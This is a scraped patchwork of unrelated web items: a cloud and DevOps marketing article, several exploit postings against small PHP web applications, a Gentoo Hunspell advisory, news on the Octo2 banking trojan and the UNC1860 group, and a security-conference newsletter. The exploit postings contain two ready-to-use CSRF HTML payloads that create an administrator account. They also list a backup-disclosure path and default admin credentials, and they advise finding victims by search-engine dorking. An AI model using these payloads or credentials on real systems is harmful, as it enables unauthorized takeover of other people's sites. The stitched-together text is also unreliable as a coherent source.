Leverage Cloud App Development and DevOps to boost business agility, scalability, and security. Optimize operations, deploy faster, and…

Leverage Cloud App Development and DevOps to boost business agility, scalability, and security. Optimize operations, deploy faster, and future-proof your business with innovative AI, ML, and IoT integrations.

In the digital age, businesses must remain agile, scalable, and secure to stay competitive. Cloud app development, paired with DevOps, offers the tools and strategies necessary to meet these demands. These technologies enable companies to optimize operations, deploy applications faster, and safeguard their data, making them critical for success in today’s fast-paced marketplace.

****How Cloud App Development Can Future-Proof Your Business****

Cloud app development allows businesses to build scalable, flexible, and cost-effective applications that grow and evolve with their needs. With cloud platforms, businesses can eliminate the limitations of traditional infrastructure, enabling faster deployment and real-time updates. These apps can also be accessed from anywhere, providing businesses with the agility required to operate globally and adapt to changing market conditions.

In addition to scalability and flexibility, cloud app development future-proofs businesses by integrating advanced technologies like artificial intelligence (AI), machine learning (ML), and the Internet of Things (IoT). These integrations allow companies to leverage data-driven insights, automate processes, and enhance customer experiences, setting the foundation for long-term growth and innovation.

****Cloud-Native Development: Building Apps Designed for the Cloud from the Ground Up****

Cloud-native development refers to building applications specifically designed to run in cloud environments. Unlike traditional apps that are migrated to the cloud, cloud-native apps are built with scalability, resilience, and flexibility in mind from the start. This approach takes advantage of cloud features such as microservices architecture, containers, and continuous integration/continuous deployment (CI/CD) pipelines.

Microservices architecture breaks down applications into smaller, independent services that can be developed, deployed, and scaled independently. This results in faster development cycles and more efficient resource management. Containers, such as Docker and Kubernetes, provide an isolated environment for these services, ensuring consistency across different cloud environments. These technologies enable cloud-native apps to be more adaptable, ensuring they can scale rapidly and respond to changes in demand.

****Why Partnering with a Cloud App Development Company is Essential for Business Scalability****

Partnering with a cloud app development company is key to unlocking the full potential of cloud technologies for business scalability. These companies possess in-depth expertise in cloud platforms and tools, ensuring that the applications they develop are customized to meet the unique needs of your business.

A cloud app development company will optimize your application for both performance and scalability, allowing your business to easily expand services, accommodate more users, or integrate new functionalities as needed. Their specialized knowledge helps businesses avoid costly errors and inefficiencies, accelerating time to market and driving sustainable growth. Moreover, these companies provide ongoing support, ensuring that your cloud app stays secure and adapts to evolving technological and business demands.

****The Role of DevOps Services in Accelerating Your Cloud Application Deployment****

DevOps, a combination of development and operations, plays a pivotal role in cloud application deployment by fostering collaboration between development and IT teams. The goal of DevOps is to streamline the development lifecycle, automate processes, and accelerate application delivery. For cloud applications, DevOps services allow businesses to deploy apps faster, improve quality, and reduce downtime.

DevOps practices, such as automated testing and continuous integration, enable teams to identify and fix issues early in the development cycle. This reduces the risk of errors during deployment and ensures that applications are consistently reliable. Additionally, infrastructure as code (IaC) tools like Terraform and Ansible allow for the automated provisioning and management of cloud infrastructure, further accelerating the deployment process.

****The Benefits of Integrating DevOps Solutions into Cloud App Development****

Integrating DevOps solutions into cloud app development brings numerous advantages. First and foremost, it enables faster and more frequent releases, allowing businesses to deploy updates and new features quickly. This is especially important in today’s competitive environment, where customer needs and market demands are constantly changing.

DevOps also enhances collaboration between teams, ensuring that development, operations, and quality assurance work together seamlessly. This collaboration leads to fewer bottlenecks, improved efficiency, and more reliable applications. Automation, a key aspect of DevOps, reduces manual tasks, minimizes errors, and improves security by ensuring that every deployment follows best practices and adheres to compliance requirements.

****Cloud App Development: The Foundation for Digital Transformation****

Cloud app development is at the core of digital transformation. It provides businesses with the infrastructure and tools needed to modernize operations, deliver innovative services, and enhance customer experiences. By moving applications to the cloud or building cloud-native apps, businesses gain the flexibility and scalability needed to experiment with new technologies and business models.

Cloud-based apps also enable businesses to access real-time data, making it easier to make informed decisions and respond to market trends. This data can be used to optimize processes, improve customer engagement, and create new revenue streams. For companies embarking on digital transformation, cloud app development is not just an option—it is a necessity.

****Cloud Security: How a Cloud App Development Company Ensures Data Protection****

Security is a top priority for any business operating in the cloud, and cloud app development companies take extensive measures to protect data. They design applications with built-in security features, such as encryption, access controls, and threat detection, to safeguard sensitive information. Moreover, these companies ensure compliance with industry standards and regulations, such as GDPR, HIPAA, and PCI-DSS, to protect businesses from legal and financial risks.

Cloud app development companies also implement automated security testing throughout the development process to identify and mitigate vulnerabilities early. Additionally, they monitor applications continuously to detect potential threats and take proactive measures to prevent breaches. By working with a trusted cloud app development company, businesses can ensure that their applications are not only high-performing but also secure and compliant with industry standards.

****Conclusion****

In conclusion, cloud app development, supported by DevOps practices, is essential for businesses looking to scale, innovate, and stay competitive in the digital age. By partnering with the right cloud app development company and integrating DevOps solutions, businesses can accelerate their digital transformation, improve application deployment, and protect sensitive data, all while staying ahead of the curve in an ever-changing technological landscape.

1.  Best Practices for Cloud Computing Security
2.  How To Safeguard Your Data With Cloud MRP System
3.  Front-End Development Matters for Online Businesses
4.  Evolution of Captive Portal to Cloud Authentication Solutions 
5.  Insights on Google Cloud Backup, Disaster Recovery Service

Harnessing the Power of Cloud App Development and DevOps for Modern Businesses

PHP ACRSS version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : php acrss 1.0 CSRF Add Admin Vulnerability                                                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202305/kashipara.com_php-acrss-zip.zip                        |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject new admin account.[+] Line 6 Set your Target.[+] Line 15+19 Set your user & pass.[+] save payload as poc.html[+] payload :<!DOCTYPE html> <html> <body> <script> function submitRequest()  { var xhr = new XMLHttpRequest();  xhr.open("POST", "http://localhost/php-acrss/classes/Users.php?f=save", true); xhr.setRequestHeader("Accept", "*\/*");  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true;  var body = "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"username\"\r\n" +  "\r\n" +  "indoushka\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"password\"\r\n" +  "\r\n" +  "Hacked\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"type\"\r\n" +  "\r\n" +  "1\r\n" +  "-------------------------------\r\n";  var aBody = new Uint8Array(body.length);  for (var i = 0; i < aBody.length; i++)  aBody[i] = body.charCodeAt(i);  xhr.send(new Blob([aBody]));  } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form>  </body>  </html>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

PHP ACRSS 1.0 Cross Site Request Forgery

Gentoo Linux Security Advisory 202409-21 - Multiple vulnerabilities have been discovered in Hunspell, the worst of which could lead to arbitrary code execution. Versions greater than or equal to 1.7.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-21  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Hunspell: Multiple Vulnerabilities  
     Date: September 24, 2024  
     Bugs: #866093  
       ID: 202409-21

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Hunspell, the worst of  
which could lead to arbitrary code execution.

Background  
==========

Hunspell is the spell checker of LibreOffice, OpenOffice.org, Mozilla  
Firefox & Thunderbird, Google Chrome.

Affected packages  
=================

Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
app-text/hunspell  < 1.7.1       >= 1.7.1

Description  
===========

Malicious input to the hunspell spell checker could result in an  
application crash or other unspecified behavior.

Impact  
======

Malicious input to the hunspell spell checker could result in an  
application crash or other unspecified behavior.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Hunspell users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-text/hunspell-1.7.1"

References  
==========

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-21

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-21

Reservation Management System version 1.0 suffers from a backup disclosure vulnerability.

**Reservation Management System 1.0 Backup Disclosure**

Posted Sep 24, 2024

Authored by indoushka

Reservation Management System version 1.0 suffers from a backup disclosure vulnerability.

tags | exploit, info disclosure

SHA-256 | 3fdb31b63dd3dffcc359c8fe22cdbfc2692c268e17a6a1cc41302fd995ff1353

Download | Favorite | View

**Reservation Management System 1.0 Backup Disclosure**

    =============================================================================================================================================| # Title     : Reservation Management System 1.0 Backup Disclosure Vulnerability                                                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/reservation.zip                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Appears to leave backups in a world accessible directory under the document root.  [+] use Payload : /admin/backup/[+] http://127.0.0.1/reservation/admin/backup/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,935)
*   Arbitrary (17,095)
*   BBS (2,859)
*   Bypass (1,925)
*   CGI (1,047)
*   Code Execution (7,919)
*   Conference (693)
*   Cracker (845)
*   CSRF (3,431)
*   DoS (25,287)
*   Encryption (2,395)
*   Exploit (54,293)
*   File Inclusion (4,275)
*   File Upload (1,018)
*   Firewall (822)
*   Info Disclosure (2,920)
*   Intrusion Detection (919)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,303)
*   Local (14,856)
*   Magazine (587)
*   Overflow (13,225)
*   Perl (1,435)
*   PHP (5,277)
*   Proof of Concept (2,412)
*   Protocol (3,749)
*   Python (1,661)
*   Remote (31,900)
*   Root (3,672)
*   Rootkit (530)
*   Ruby (643)
*   Scanner (1,658)
*   Security Tool (8,050)
*   Shell (3,305)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,297)
*   SQL Injection (16,731)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (675)
*   Vulnerability (33,120)
*   Web (10,141)
*   Whitepaper (3,785)
*   x86 (970)
*   XSS (18,303)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,115)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,125)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,591)
*   HPUX (881)
*   iOS (390)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,312)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (490)
*   RedHat (16,885)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,861)
*   UNIX (9,458)
*   UnixWare (188)
*   Windows (6,772)
*   Other

Reservation Management System 1.0 Backup Disclosure

Rail Pass Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Rail Pass Management System 1.0 Insecure Settings Vulnerability                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/rail-pass-management-system-using-php-and-mysql/                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/rpms/admin/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Rail Pass Management System 1.0 Insecure Settings

PreSchool Enrollment System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : PreSchool Enrollment System 1.0 Insecure Settings Vulnerability                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/pre-school-enrollment-system-using-php-and-mysql/                                           |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/preschool/admin/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

PreSchool Enrollment System 1.0 Insecure Settings

PHP SPM version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : php spm 1.0 CSRF Add Admin Vulnerability                                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202305/kashipara.com_php-spms-zip.zip                         |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject new admin account.[+] Line 6 Set your Target.[+] Line 15+19 Set your user & pass.[+] save payload as poc.html[+] payload :<!DOCTYPE html> <html> <body> <script> function submitRequest()  { var xhr = new XMLHttpRequest();  xhr.open("POST", "http://127.0.0.1/php-spms/classes/Users.php?f=save", true); xhr.setRequestHeader("Accept", "*\/*");  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true;  var body = "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"username\"\r\n" +  "\r\n" +  "indoushka\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"password\"\r\n" +  "\r\n" +  "Hacked\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"type\"\r\n" +  "\r\n" +  "1\r\n" +  "-------------------------------\r\n";  var aBody = new Uint8Array(body.length);  for (var i = 0; i < aBody.length; i++)  aBody[i] = body.charCodeAt(i);  xhr.send(new Blob([aBody]));  } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form>  </body>  </html>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

PHP SPM 1.0 Cross Site Request Forgery

Cybersecurity researchers have discovered a new version of an Android banking trojan called Octo that comes with improved capabilities to conduct device takeover (DTO) and perform fraudulent transactions.
The new version has been codenamed Octo2 by the malware author, Dutch security firm ThreatFabric said in a report shared with The Hacker News, adding campaigns distributing the malware have

Mobile Security / Cybercrime

Cybersecurity researchers have discovered a new version of an Android banking trojan called Octo that comes with improved capabilities to conduct device takeover (DTO) and perform fraudulent transactions.

The new version has been codenamed **Octo2** by the malware author, Dutch security firm ThreatFabric said in a report shared with The Hacker News, adding campaigns distributing the malware have been spotted in European countries like Italy, Poland, Moldova, and Hungary.

"The malware developers took actions to increase the stability of the remote actions capabilities needed for Device Takeover attacks," the company said.

Some of the malicious apps containing Octo2 are listed below -

*   Europe Enterprise (com.xsusb\_restore3)
*   Google Chrome (com.havirtual06numberresources)
*   NordVPN (com.handedfastee5)

Octo was first flagged by the company in early 2022, describing it as the work of a threat actor who goes by the online aliases Architect and goodluck. It has been assessed to be a "direct descendant" of the Exobot malware originally detected in 2016, which also spawned another variant dubbed Coper in 2021.

"Based on the source code of the banking Trojan Marcher, Exobot was maintained until 2018 targeting financial institutions with a variety of campaigns focused on Turkey, France and Germany as well as Australia, Thailand and Japan," ThreatFabric noted at the time.

"Subsequently, a 'lite' version of it was introduced, named ExobotCompact by its author, the threat actor known as 'android' on dark-web forums."

The emergence of Octo2 is said to have been primarily driven by the leak of the Octo source code earlier this year, leading other threat actors to spawn multiple variants of the malware.

Another major development is Octo's transition to a malware-as-a-service (MaaS) operation, per Team Cymru, enabling the developer to monetize the malware by offering it to cybercriminals who are looking to carry out information theft operations.

"When promoting the update, the owner of Octo announced that Octo2 will be available for users of Octo1 at the same price with early access," ThreatFabric said. "We can expect that the actors that were operating Octo1 will switch to Octo2, thus bringing it to the global threat landscape."

One of the significant improvements to Octo2 is the introduction of a Domain Generation Algorithm (DGA) to create the command-and-control (C2) server name, as well as improving its overall stability and anti-analysis techniques.

The rogue Android apps distributing the malware are created using a known APK binding service called Zombinder, which makes it possible to trojanize legitimate applications such that they retrieve the actual malware (in this case, Octo2) under the guise of installing a "necessary plugin."

"With the original Octo malware's source code already leaked and easily accessible to various threat actors, Octo2 builds on this foundation with even more robust remote access capabilities and sophisticated obfuscation techniques," ThreatFabric said.

"This variant's ability to invisibly perform on-device fraud and intercept sensitive data, coupled with the ease with which it can be customized by different threat actors, raises the stakes for mobile banking users globally."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Octo2 Android Banking Trojan Emerges with Device Takeover Capabilities

The group has used more than 30 custom tools to target high-value government and telecommunications organizations on behalf of Iranian intelligence services, researchers say.

Source: Christophe Coat via Alamy Stock Photo

An advanced persistent threat (APT) tied to Iran's Ministry of Intelligence and Security (MOIS) is providing initial access services to a bevy of Iranian state hacking groups.

UNC1860 has been the gateway for attacks by notorious groups like Scarred Manticore and OilRig (aka APT34, Helix Kitten, Cobalt Gypsym, Lyceum, Crambus, or Siamesekitten). As Mandiant explained in a recent blog post, its focus is exclusively on breaching and establishing a foothold in potentially valuable networks across high-value sectors — government, media, academia, critical infrastructure, and particularly telecommunications — then handing over access to other Iranian nation-state actors.

Over the years, UNC1860 has teamed up for attacks against targets in Iraq, Saudi Arabia, and Qatar; aided in espionage of Mideast telecommunications companies; prepared the ground for wiper attacks in Albania and Israel; and more.

**UNC1860's Many Backdoors**

In March, Israel's National Cyber Directorate warned that wiper attacks were striking organizations across the country, including managed service providers, local governments, and academic institutions. Among the indicators of compromise (IoCs) were a Web shell called "Stayshante" and a dropper called "Sasheyaway," just two of around 30 custom malware tools managed by UNC1860, the Mandiant report explained.

UNC1860 isn't the one doing the wiping, or any other disruptive, destructive, or otherwise exploitative behavior in a target's network. Its job is merely to gain that initial foothold, primarily by scanning for vulnerabilities in public-facing assets at targeted organizations, then dropping a series of increasingly serious and sophisticated backdoors. 

Stayshante, Sasheyaway, and tools like it provide its first toe in the water, and can be used to download more substantial backdoors like "Templedoor," "Faceface," and "Sparkload." For its highest-value targets, UNC1860 will deploy its most sophisticated, main-stage backdoors like "Templedrop," or "Oatboat," which loads and executes payloads such as "Tofupipe" and "Tofuload," TCP-based passive listeners.

"To set up those listeners, they are not even leveraging regular Windows API calls — they actually leverage some undocumented tools of HTTP.sys, which is crazy," says Stav Shulman, senior researcher with Mandiant by Google Cloud.

"Most backdoors would leverage common API calling, so most engines would detect them," Shulman explains. "But if you are determined enough, and clever enough, and if you have extraordinary technical knowledge, you can leverage calls that are not documented by the Microsoft Developer Network (MSDN). So UNC1860 actually reverse engineered them themselves, so that you won't detect their calls."

**UNC1860's Trick to Staying Undetected**

Besides its lack of destructive behavior, there's another reason why you hear about Scarred Manticore, Oil Rig, and Shrouded Snooper, but rarely UNC1860: All of UNC1860s implants are entirely passive. It doesn't send any information out from target networks, and doesn't need to maintain any kind of command-and-control (C2) infrastructure.

"Most detections today are very focused on outbound communications, but UNC1860 just focuses on inbound requests," Shulman says. "That inbound traffic they listen to can come from any number of stealthy sources \[including\] VPN nodes in proximity to the target, other victims of prior attacks, and other locations in a target's network."

In 2020, for example, the group was observed using one of its victims' networks as a launch point to scan for potentially vulnerable IP addresses in Saudi Arabia, vet various accounts and email addresses associated with domains in Saudi Arabia in Qatar, and target VPN servers in the same region.

And, as Shulman notes, "To escalate the operation, they only need to send one command at any random point in time to activate the backdoor." Because the group's implants utilize HTTPS-encrypted traffic, victims will not be able to decrypt its commands or payloads.

Shulman advises organizations to focus on how best to vet incoming network traffic.

"How do we detect \[malicious traffic\]? How do we decide if incoming traffic is malicious or not?" Shulman says. "Because even \[when UNC1860 is abusing\] documented API calls that cybersecurity engines would catch, there's plenty of legitimate software that use these same calls, so detecting malicious calls could be very confusing and have lots of false positives. Focusing on the incoming traffic is the key, I think, for detecting UNC1860's activity."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Meet UNC1860: Iran's Low-Key Access Broker for State Hackers

The Call For Papers for nullcon Goa 2025 is now open. Nullcon is an information security conference held in Goa, India. The focus of the conference is to showcase the next generation of offensive and defensive security technology. It will take place March 1st through the 2nd, 2025.

Do you wish to become a speaker at Nullcon Goa 2025? The opportunities are endless. The time to think is long gone - Take the only leap to share your research with our infosec community.

Call For Papers - Nullcon Goa 2025 (https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyl0g3gVDYW7lCdLW6lZ3krW5sVJnn2b1pGgW4VfGFw4gSKwKW7T9v298lCB3rW3MyVZN4QZdRZVmt5bS5SZh7_W1gd6mX1JJnTgW3T-ygY70DWZQN8BqbRky-cK7N78QdcBNhhTdW4S5D_934wdgsW5g4QSF1XLcrBW3xm9qY5Fq0K7W29YBzm5FFJZqW1DbVDt8_D4C-W32Tv4x5mwwtFW3G8VF11yBc2DW2_C3z-89wwR2W44r2CW30gPzPW1LCpQB3TC7rDN2_4JXml3TQNW2sxvNm5d4LyqW91kdFY8BF16dW6B3Ycm8XSXV4W7G9dPx4GkwKZf8kv1DK04 )

OPEN...Call For Papers (CFP) for Nullcon Goa 2025

Do you wish to become a speaker at Nullcon Goa 2025? The opportunities are endless. The time to think is long gone - Take the only leap to share your research with our infosec community.

CFP Closes: 15th November 2024

Conference: 1st-2nd March 2025

Venue: BITS, Goa

Submission Topics (but not limited to):

- IoT/Embedded Security/OT  
- Web Applications / AI Security  
- Browser Security  
- Fuzzing & Exploit Development  
- Bug Hunting and Vulnerability Research  
- Forensic  
- Malware & Incident Response  
- Cloud and Infrastructure Security

Know More About Speaker Benefits / Submission Guidelines  
(https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyl0g3gVDYW7lCdLW6lZ3krW5sVJnn2b1pGgW4VfGFw4gSKwKW7T9v298lCB3rW3MyVZN4QZdRZVmt5bS5SZh7_W1gd6mX1JJnTgW3T-ygY70DWZQN8BqbRky-cK7N78QdcBNhhTdW4S5D_934wdgsW5g4QSF1XLcrBW3xm9qY5Fq0K7W29YBzm5FFJZqW1DbVDt8_D4C-W32Tv4x5mwwtFW3G8VF11yBc2DW2_C3z-89wwR2W44r2CW30gPzPW1LCpQB3TC7rDN2_4JXml3TQNW2sxvNm5d4LyqW91kdFY8BF16dW6B3Ycm8XSXV4W7G9dPx4GkwKZf8kv1DK04 )

Nullcon Bangalore 2024

Learn Via Experiences, Not Just Books

Do you know what today’s cutting-edge tech jobs at major companies truly require?

It’s all about the hands-on expertise you’ve developed—through the projects you’ve undertaken and the practical knowledge needed to address real-world business challenges.

Dates: 7th-9th November 2024 | Venue: Hotel Royal Orchid, Bangalore

Hacking Modern Web Apps: Master the Future of Attack Vectors

By Anirudh Anand & Abraham Aranguren

Malware Analysis 0x65: Dissecting & Demystifying Attackers Mindset

By Abhinav Thakur & Niraj Shivtarkar

Practical IoT Hacking

By Hemant Sonkar, Ranit Pradhan, Pugal Selvan & Rupesh Surve

StealthOps: Red Team Operations 24 Edition

By Manish Gupta & Yash Bharadwaj

Sold Out! AI Security: Terminating The Terminator

By Nikhil Joshi

Register with Early Bird Discount!  
(https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyl0z3gVDYW7Y8-PT6lZ3pcW5Z_6zg6bPGw2N6gYMkp15jT0W94QVDk5P5PGyW3BDWFv8GSrP3W72QF1V8zzkJNW72brp-6RfrTGW7F0XXD8X5WVcVQfWd_4HT-BxW1m36Rn7gDN4zW47VSWV8yk5TPN667G5NY2gy8W68yBjv4PZ9THW8rPGRk5k34v2W2KnQWS8y9qwDVPwXGw95657DW8xQm9N1LRLCMN3-7DJW3WTcGW4cdvMh89YnKQW6yx1R52qBcnPW10Yff22vQrxhW7x0pkw35WfrrN7tnpf5GJMDfW9dmylv4bzq_6W16R0NG98-VTfW3mXFMM77D_mNW8HbkFz30psD8f7kC9fg04 )

Job Openings 💼

Evernorth Health Services is looking for a Cyber Security Senior Advisor (https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyl0z3lcq-W7Y8-PT6lZ3mKVxYnF46myHbmVmLD9799wBlpW3V-q831YL_kjW6mZcrB1_s4MmVddB_T60XB9QW7tCfZ13Rd87YW6yYyk-4rqZrqW7XZc046p4cynW1HYc_Q788LnWW60HDdD3VJq12W4CJys-8r4d8dW6YjvF25hsLpmW8xPbw63Z14grW51l1tj3NRGpqW4t6HCC8wl_JdW87p0H610_QYZW2nYpRK88rGG8W2Tvq145BNTtYW7t0Hqr1lmbz3W7Gp8Yt3w6F4qW1xPB-28bMCxqVJm8ZP6Zs0mqW5gP7mz9dl99XN1N1pB2ftxQ3W7c_Hg75vtHfYVXdncG5_P77pf2LHb7g04 ) and a Cyber Security Associate Principal (https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyl0z3lcq-W7Y8-PT6lZ3q7W69Cbdx3b0ZPmN1txRLMr9jfGW8YlfXJ1t2SZbW7jqJs02dS2jYW3lB4Tf2H7CdyW8cKyQr2xJjkdW4ssmfL7d5VzZW1jCqVN3sT8STN3ggNMXxz7CyW1QMJl43BNt8_W6wds4T8BTMsVVtkX2812bpl_W5TGFq43tyJ14W5QN2MZ8gWVPfW6RGlK55JkqxgW3zBXk38Yh9JFW1B4LC76pT6GvW4Gg4YR7Ht5yVW7SsDDh2Cf737My2j9mKT9PfW8sj_1-4cpFbXW1_R_5y3nmwcBN2flG7Qs29d0W3DHv8f6018g2W47lJ1m5NB8dfW78qmSX3lK69Hd5c1WH04 ) in Hyderabad, India

Google is looking for a Security Engineer, Android Security Assurance (https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyk_H5jMY8W69t95C6lZ3pgW7CTQgt6mr-qhW6jgM7f1-TYgNW37sGhY6Fw_MhW3W5hJT3q8xHNW7Dshmj63jCQfMBf7qFzVDkGV1Nwnq1GnCRDW53kp827KkSHjW4kSz1b8DYx2KW33j2fs8ZVDgVW6Ksb1-8_BL3XW4p38gd23RL8lW8Rxnqg1x39n4W8grlTQ89hWP9W7BMh8L22G3RGW72X6Xh7glvrQW1GrZn127P4BlW6ldgZ72C4z86W6f-mJf4sGn7BW84VW45328XTZW7mHvgT82H0HvW7fg1jB43mhcLW6-Vfwl28QHmsW3x1pKc88p20dW3XT4xj1yH5f5W37d9Cp2lWLKgW9612FS8_SBfpW5RwJSL7xH16WW4kzq758RwLFSW5S-KcT7J59fNN9kkyZKPF3VfW7T37gM6tYfQDW3bCHmt4S12ZtV6zTbL4L3yr5W3J9mvh4pvbFmW4gVFgc8BwKzFf7w0CsC04 ) in Bangalore, India

InfoSec Connect 👥

